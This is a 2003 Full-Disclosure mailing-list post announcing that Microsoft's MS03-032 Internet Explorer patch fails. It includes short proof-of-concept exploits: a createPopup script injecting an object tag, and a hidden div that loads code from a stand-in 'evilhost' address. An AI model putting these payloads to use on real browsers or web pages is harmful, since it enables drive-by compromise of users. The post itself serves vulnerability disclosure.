----- Original Message ----- From: "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> To: <[EMAIL PROTECTED]> Sent: Sunday, September 07, 2003 6:17 AM Subject: [Full-Disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032
> > > Since the cat somehow got out of the bag, and more importantly, this > is so blatantly obvious, herewith is the "Bad News": > > The patch for Drew's object data=funky.hta doesn't work: > > http://www.malware.com/badnews.html > > <script> > var oPopup = window.createPopup(); > > function showPopup() { > oPopup.document.body.innerHTML = "<object data=ouch.php>"; > oPopup.show(0,0,1,1,document.body); > } > > showPopup() > </script> this works too... <div style="display.none"><object data="http://evilhost/realbad.asp";> </object>oh</div> beware the mail... and the rewtXSS skillz Donnie Werner [EMAIL PROTECTED] http://exploitlabs.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
